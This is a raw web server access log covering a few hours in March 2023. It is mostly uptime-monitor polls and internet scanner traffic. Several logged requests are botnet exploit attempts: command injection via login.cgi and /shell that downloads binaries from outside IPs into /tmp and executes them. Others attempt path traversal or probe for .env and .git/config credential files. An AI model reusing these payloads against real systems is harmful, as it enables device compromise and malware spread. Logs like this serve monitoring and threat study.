4.14.70.9 - - [03/Mar/2023:23:02:22 +0100] "POST /database HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:23:03:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:04:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:05:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:06:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:07:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:08:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:09:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:10:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:11:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.45 - - [03/Mar/2023:23:11:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.45 - - [03/Mar/2023:23:11:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.45 - - [03/Mar/2023:23:11:40 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.45 - - [03/Mar/2023:23:11:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2023:23:12:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:13:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:14:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:15:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:16:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:17:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:18:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:19:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:20:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:21:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:22:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:23:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:24:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.34.146.227 - - [03/Mar/2023:23:24:50 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Mar/2023:23:25:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:26:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:27:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:28:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:29:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
169.150.201.24 - - [03/Mar/2023:23:29:32 +0100] "GET /1.sql HTTP/1.1" 404 310 "-" "python-requests/2.28.2"
128.14.133.58 - - [03/Mar/2023:23:29:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
103.124.138.65 - - [03/Mar/2023:23:29:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [03/Mar/2023:23:30:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [03/Mar/2023:23:30:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Mar/2023:23:31:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:32:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:33:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:34:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:35:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:36:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:37:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:38:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:39:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:40:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:41:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.46 - - [03/Mar/2023:23:41:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.46 - - [03/Mar/2023:23:41:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [03/Mar/2023:23:41:07 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.46 - - [03/Mar/2023:23:41:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Mar/2023:23:42:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:43:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
50.116.50.137 - - [03/Mar/2023:23:43:13 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [03/Mar/2023:23:44:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:45:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:46:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:47:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "\x16\x03\x01" 501 318 "-" "-"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "HELP" 501 319 "-" "-"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /s/5383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800063) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /.vscode/sftp.json HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
74.207.237.114 - - [03/Mar/2023:23:47:13 +0100] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
sentiment.scan.leakix.org - - [03/Mar/2023:23:47:13 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Mar/2023:23:48:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:49:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:50:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:51:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:52:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:53:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:54:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:55:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
130.211.54.158 - - [03/Mar/2023:23:55:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
212.91.246.72 - - [03/Mar/2023:23:56:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:57:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:58:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2023:23:59:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.201.94.238 - - [04/Mar/2023:00:04:53 +0100] "GET /src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
118.201.94.238 - - [04/Mar/2023:00:04:54 +0100] "POST /src HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
118.201.94.238 - - [04/Mar/2023:00:05:04 +0100] "GET /src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
118.201.94.238 - - [04/Mar/2023:00:05:05 +0100] "POST /src HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:05:51 +0100] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:05:52 +0100] "POST /newsite HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
118.201.94.238 - - [04/Mar/2023:00:08:22 +0100] "GET /src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
118.201.94.238 - - [04/Mar/2023:00:08:23 +0100] "POST /src HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
169.150.201.24 - - [04/Mar/2023:00:11:31 +0100] "GET /1.sql HTTP/1.1" 404 310 "-" "python-requests/2.28.2"
94.34.146.227 - - [04/Mar/2023:00:17:48 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
116.107.242.204 - - [04/Mar/2023:00:19:09 +0100] "GET /crm/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
116.107.242.204 - - [04/Mar/2023:00:19:10 +0100] "POST /crm HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:20:12 +0100] "GET /base/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:20:13 +0100] "POST /base HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:20:22 +0100] "GET /base/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:20:22 +0100] "POST /base HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [04/Mar/2023:00:22:34 +0100] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [04/Mar/2023:00:22:34 +0100] "POST /library HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:23:14 +0100] "GET /base/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
141.193.195.165 - - [04/Mar/2023:00:23:14 +0100] "POST /base HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.77.127.183 - - [04/Mar/2023:00:27:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
51.158.37.156 - - [04/Mar/2023:00:30:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.37.156 - - [04/Mar/2023:00:30:13 +0100] "GET /cgi-bin/downloadFlile.cgi HTTP/1.1" 404 330 "-" "Hello World"
162.142.125.10 - - [04/Mar/2023:00:31:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.10 - - [04/Mar/2023:00:31:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.10 - - [04/Mar/2023:00:31:36 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.10 - - [04/Mar/2023:00:31:36 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
205.210.31.178 - - [04/Mar/2023:00:35:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
103.60.60.186 - - [04/Mar/2023:00:36:14 +0100] "GET /client/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.60.60.186 - - [04/Mar/2023:00:36:14 +0100] "POST /client HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.60.60.186 - - [04/Mar/2023:00:36:23 +0100] "GET /client/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.60.60.186 - - [04/Mar/2023:00:36:24 +0100] "POST /client HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [04/Mar/2023:00:37:11 +0100] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [04/Mar/2023:00:37:11 +0100] "POST /core HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.60.60.186 - - [04/Mar/2023:00:39:20 +0100] "GET /client/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
103.60.60.186 - - [04/Mar/2023:00:39:21 +0100] "POST /client HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
89.140.17.10 - - [04/Mar/2023:00:42:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
79.100.93.128 - - [04/Mar/2023:00:49:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
64.85.173.196 - - [04/Mar/2023:00:51:23 +0100] "GET /app/config/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
64.85.173.196 - - [04/Mar/2023:00:51:23 +0100] "POST /app/config HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Mar/2023:00:56:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
4.1.229.86 - - [04/Mar/2023:01:05:43 +0100] "GET /audio/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.1.229.86 - - [04/Mar/2023:01:05:43 +0100] "POST /audio HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
138.199.34.193 - - [04/Mar/2023:01:08:00 +0100] "CONNECT upload.wikimedia.org:443 HTTP/1.1" 405 350 "-" "Java/1.8.0_352"
128.14.141.34 - - [04/Mar/2023:01:16:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [04/Mar/2023:01:16:12 +0100] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [04/Mar/2023:01:16:12 +0100] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [04/Mar/2023:01:16:13 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [04/Mar/2023:01:16:13 +0100] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.91.47.43 - - [04/Mar/2023:01:18:27 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.32.162.159 - - [04/Mar/2023:01:19:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [04/Mar/2023:01:23:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.32.162.159 - - [04/Mar/2023:01:23:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.142.236.43 - - [04/Mar/2023:01:24:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.43 - - [04/Mar/2023:01:24:54 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.43 - - [04/Mar/2023:01:24:54 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.43 - - [04/Mar/2023:01:24:55 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
